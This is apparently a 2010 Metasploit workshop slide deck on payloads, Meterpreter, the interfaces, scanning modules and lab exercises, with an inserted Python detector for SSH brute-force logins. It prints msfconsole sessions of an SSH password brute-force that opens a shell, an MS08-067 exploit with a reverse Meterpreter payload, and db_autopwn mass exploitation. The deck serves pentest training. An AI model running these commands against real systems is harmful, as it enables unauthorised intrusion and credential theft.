Metasploit Framework Unleashed – beyond Metasploit
Penetration Tests vs. Vulnerability Scanning
Exploiting Frameworks
Metasploit History
Payloads
Bind- vs. Reverse Shell
Meterpreter
MSF in practice
User interfaces
Scanning (Auxiliary Modules)
▪ Databases
▪ Passwords – part 1
Automated hacking
Outlook …
<< Content <<
Vulnerability Scans / Vulnerability Management
▪ Technical IT security assessments of selected/all systems/(applications)
▪ Automated checks
▪ Compliance (e.g. PCI – 4 times a year)
Pentests
▪ Technical IT security assessments of selected/all systems/applications
▪ Simulation of an attacker
▪ Manual and automated testing
▪ Combination of several vulnerabilities → escalation chain
▪ Depiction of the real threat scenario
▪ Compliance (e.g. PCI – once a year)
<< Intro <<
What do exploiting frameworks include?
Vulnerability scanner
▪ Mostly implemented via interfaces to external products
Password scanner
Port scanner
Service scanner
Exploits ;)
Shells/Payloads (Reverse/Bind/HTTP(S)/DNS…)
Agents (persistent/non-persistent)
Central management console
Scripting functionality
Various automation mechanisms
Fuzzers and further research capabilities
<< Intro <<
Advantages ~ comprehensive framework
▪ Uniform
▪ Tested
▪ Reliable
▪ Automated
Disadvantages ~ comprehensive framework
▪ Uniform
▪ Tested
▪ Reliable
▪ Automated
• Out of the box thinking?
• Creativity of the tester?
• Know-how of the tester?
• Tool for N00bs?
• … and script kiddies?
<< Intro <<
Core Impact by Core Security
http://www.coresecurity.com/content/core-impact-overview
Canvas by Immunity
http://www.immunitysec.com/products-canvas.shtml
Metasploit by Rapid 7
http://www.metasploit.com/
<< Frameworks <<
<< Core Impact <<
drag & drop
<< Core Impact <<
Assistance:
<< Core Impact <<
<< Canvas <<
2003 – Founded by HD Moore
V1.0 – 11 exploits
V2.0 – Framework rewritten (Perl)
V2.2 – Meterpreter
V2.7 – 150 modules, 44,000 lines of source code
V3.0 – Ruby
V3.1 – 450 modules, 150,000 lines of source code
V3.2 – 570 modules, 300,000 lines of source code
End of 2009 – Acquisition by Rapid 7
V3.3 – ~800 modules, ~420,000 lines of source code, Rapid7
June 2010 V3.4 – Metasploit Express (support/commercial GUI/3k$)
Metasploit grows up
<< History <<
Metasploit everywhere …
Linux
Windows
Mac OS X
BSD
OpenWRT
IPhone/IPod Touch
…
<< Everywhere<<
Bind Payload
“Bad Guy”
Exploit
Payload Connection
Bind Shell
<< Payloads <<
Bind Payload broken
“Bad Guy”
Exploit
Payload Connection
Bind Shell
<< Payloads <<
Reverse Payloads
“Bad Guy”
Exploit
Payload Connection
<< Payloads <<
Encrypted connection (SSLv3)
Good luck to the IDS
Runs exclusively in memory
Good luck to the forensic analyst
AV evading
Good luck to the virus scanner
Upload/download files
Migrate into other processes
System info - ps/getuid/migrate/getpid
Meterpreter scripts
hashdump
Automated post-exploitation process (run winenum)
<< Meterpreter <<
On Backtrack
wget http://updates.metasploit.com/data/releases/framework-3.5.0-linux-i686.run
Create a backup
root@bt:~# ls -d /opt/metasploit3*
/opt/metasploit33-stable /opt/metasploit334
/opt/metasploit331 /opt/metasploit341
/opt/metasploit333 /opt/metasploit34-stable
./framework-3.5.0-linux-i686.run … and that's it
Linux in general: http://www.metasploit.com/redmine/projects/framework/wiki/Install_Linux
<< Install <<
root@bt:/opt/metasploit35-dev/msf3# ./msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
…
Updated to revision 10853.
root@bt:/opt/metasploit35-dev/msf3# svn update
At revision 10853.
<< Update <<
No longer maintained
Buggy
Good for simple demonstrations
Good for documentation
<< MSFWeb<<
Removed from MSF in October
root@bt:~# /opt/metasploit34-stable/msf3/msfweb -h
[*] Warning: As of Metasploit 3.3 this interface is no longer supported:
Usage: msfweb <options>
OPTIONS:
    -a <opt>  Bind to this IP address instead of loopback
    -d        Daemonize the web server
    -h        Help banner
    -p <opt>  Bind to this port instead of 55555
    -s        Automatically open the browser
<< MSFWeb<<
No longer maintained
Buggy
Good for simple demonstrations
Good for documentation
Removed from MSF in July and replaced by a new GUI!
<< MSFGUI<<
New GUI …
<< MSFGUI<<
<< MSFCLI<<
<< Express <<
Support
Web GUI
Optimized pentesting workflow
Integration of further tools and scanners
Automation rocks
<< Express <<
<< CONSOLE <<
<< CONSOLE <<
msf > help
Core Commands
=============

    Command     Description
    -------     -----------
    ?           Help menu
    back        Move back from the current context
    banner      Display an awesome metasploit banner
    cd          Change the current working directory
    color       Toggle color
    connect     Communicate with a host
    exit        Exit the console
    help        Help menu
    info        Displays information about one or more module
    irb         Drop into irb scripting mode
    jobs        Displays and manages jobs
    kill        kill a job
    load        Load a framework plugin
    loadpath    Searches for and loads modules from a path
    quit        Exit the console
    resource    Run the commands stored in a file
    route       Route traffic through a session
    save        Saves the active datastores
    search      Searches module names and descriptions
    sessions    Dump session listings and display information about sessions
    set         Sets a variable to a value
<snip>
connect
check
scanner/snmp/community
scanner/smb/smb_login
scanner/smb/smb_version
scanner/smb/smb_enumusers
scanner/smb/smb_enumshares
auxiliary/gather/dns_enum
auxiliary/scanner/discovery/arp_sweep
scanner/vnc/vnc_none_auth
server/browser_autopwn
▪ But that is another story
<< Scanning <<
Only a very small excerpt of all available modules
msf > search -t auxiliary
Metasploit is not a cure-all!
Connect - netcat, Nmap
SNMP-Stuff - snmpcheck.pl, Nmap
SMB Stuff - samrdump.py, Nmap
dns_enum - dig etc.
arp_sweep - Nmap
vnc_none_auth - Nmap, MSFv2 (realvnc_41_bypass)
<< Scanning <<
Password Fu
msf > search -t auxiliary _login
[*] Searching loaded modules for pattern '_login'...

Auxiliary
=========

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   admin/oracle/oracle_login          2008-11-20       normal  Oracle Account Discovery.
   scanner/ftp/ftp_login                               normal  FTP Authentication Scanner
   scanner/http/axis_login                             normal  Apache Axis2 v1.4.1 Brute Force Utility
   scanner/http/frontpage_login                        normal  FrontPage Server Extensions Login Utility
   scanner/http/http_login                             normal  HTTP Login Utility
   scanner/http/tomcat_mgr_login                       normal  Tomcat Application Manager Login Utility
   scanner/http/wordpress_login_enum                   normal  Wordpress Brute Force and User Enumeration Utility
   scanner/lotus/lotus_domino_login                    normal  Lotus Domino Brute Force Utility
   scanner/mssql/mssql_login                           normal  MSSQL Login Utility
   scanner/mysql/mysql_login                           normal  MySQL Login Utility
   scanner/postgres/postgres_login                     normal  PostgreSQL Login Utility
   scanner/smb/smb_login                               normal  SMB Login Check Scanner
   scanner/ssh/ssh_login                               normal  SSH Login Check Scanner
   scanner/ssh/ssh_login_pubkey                        normal  SSH Public Key Login Scanner
   scanner/telnet/telnet_login                         normal  Telnet Login Check Scanner
<< Scanning <<
Password Fu
msf auxiliary(ssh_login) > run

[*] 10.8.28.66:12345 - SSH - Starting buteforce
[*] 10.8.28.66:12345 - SSH - Trying: username: 'sysadm' with password: ''
[-] 10.8.28.66:12345 - SSH - Failed: 'sysadm':''
[*] 10.8.28.66:12345 - SSH - Trying: username: 'sysadm' with password: '777777'
[*] Command shell session 1 opened (10.8.28.9:57817 -> 10.8.28.66:12345) at Mon Nov 01 17:02:43 +0100 2010
[+] 10.8.28.66:12345 - SSH - Success: 'sysadm':'777777' 'uid=1000(sysadm) gid=1000(sysadm) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(sysadm) Linux pown-me 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
<< Scanning <<
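Seen from the target's side, the ssh_login run above leaves a burst of failed password attempts followed by an accepted one in the sshd log. The following is an added example (not part of the original slides) that flags this pattern; the log lines are constructed in OpenSSH's syslog format using the slide's host name and addresses, and the failure threshold, time window and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH sshd syslog lines reporting the result of password authentication.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def find_guessed_logins(lines, min_failures=3,
                        window=timedelta(minutes=10), year=2010):
    """Return (source, user, failures) for every accepted password login
    that follows at least min_failures failed attempts from the same source
    inside the time window. Syslog timestamps carry no year, so one is
    supplied; threshold and window are assumptions to tune per environment."""
    recent_failures = defaultdict(deque)  # source address -> failure times
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a password authentication result
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        fails = recent_failures[m["src"]]
        # Forget failures that have fallen out of the sliding window.
        while fails and ts - fails[0] > window:
            fails.popleft()
        if m["result"] == "Failed":
            fails.append(ts)
        elif len(fails) >= min_failures:
            # A success right after a run of failures: likely a guessed password.
            alerts.append((m["src"], m["user"], len(fails)))
            fails.clear()
    return alerts


# Constructed sample: 10.8.28.9 guesses until it succeeds, while 10.8.28.20
# is a user who mistypes the password once before logging in.
SAMPLE_LOG = """\
Nov  1 17:02:40 pown-me sshd[2301]: Failed password for sysadm from 10.8.28.9 port 57811 ssh2
Nov  1 17:02:41 pown-me sshd[2303]: Failed password for sysadm from 10.8.28.9 port 57813 ssh2
Nov  1 17:02:42 pown-me sshd[2305]: Failed password for invalid user admin from 10.8.28.9 port 57815 ssh2
Nov  1 17:02:43 pown-me sshd[2307]: Accepted password for sysadm from 10.8.28.9 port 57817 ssh2
Nov  1 17:05:10 pown-me sshd[2320]: Failed password for sysadm from 10.8.28.20 port 40112 ssh2
Nov  1 17:05:18 pown-me sshd[2322]: Accepted password for sysadm from 10.8.28.20 port 40114 ssh2
""".splitlines()

if __name__ == "__main__":
    for src, user, failures in find_guessed_logins(SAMPLE_LOG):
        print(f"ALERT {src}: login as {user} after {failures} failed attempts")
```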
msf > search -t auxiliary mssql|mysql|oracle|postgre
admin/mssql/mssql_enum
admin/mssql/mssql_exec
admin/mysql/mysql_enum
admin/oracle/oracle_login
admin/oracle/oraenum
admin/oracle/sid_brute
scanner/mssql/mssql_login
scanner/mysql/mysql_login
scanner/mysql/mysql_version
admin/postgres/postgres_readfile
<< Databases <<
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 10.8.28.9
LHOST => 10.8.28.9
msf exploit(ms08_067_netapi) > set RHOST 10.8.28.244
RHOST => 10.8.28.244
msf exploit(ms08_067_netapi) > exploit
<< Exploiting<<
<< auto hacking <<
msf > db_import
db_import
db_import_ip_list
db_import_nessus_nbe
db_import_nmap_xml
db_import_amap_mlog
db_import_msfe_xml
db_import_nessus_xml
db_import_qualys_xml
msf > db_autopwn
<< auto hacking <<
msf > db_driver
msf > db_create [database] / db_connect
msf > db_import_xyz
msf > db_hosts
msf > db_services
msf > db_vulns
msf > db_autopwn
[*] Usage: db_autopwn [options]
<snip>
-t Show all matching exploit modules
-x Select modules based on vuln. references
-p Select modules based on open ports
-e Launch exploits against all targets
-R [rank] Only run modules with a minimal rank
<snip>
<< auto hacking <<
msf > db_driver
msf > db_create [database] / db_connect
msf > load nexpose
msf > nexpose_connect <USERNAME>:<PASSWORD>@127.0.0.1
msf > nexpose_scan 192.168.0.100
msf > db_autopwn -t -x
Metasploitable – db_autopwn/msf express rocks ;)
▪ http://www.metasploit.com/documents/express/Metasploitable.txt
Windows XP for free ;)
▪ http://www.offensive-security.com/metasploit-unleashed/metasploit-unleashed-free-information-security-training
Fedora Core 4
Ubuntu 7.04
Old Windows and Linux systems …
<< Dry run <<
Now – hacking the lab
Afternoon:
Fancy – client side kung fu
SMTX – client side kung fu part 2
M1k3 – meterpreter kung fu
<< and now? <<
Information is everything
DNS analysis
SNMP scans
SMB scans
Port scans (Nmap/internal modules)
Find the databases
Password attacks (SSH/Telnet/DB/SMB/….)
Find systems that are vulnerable to MS08-067
VNC analysis …
Exploit whatever you can
<< hacking the lab <<
<< thx <<
Contact: [email protected] http://www.s3cur1ty.de http://www.back-track.de http://www.metasploit.eu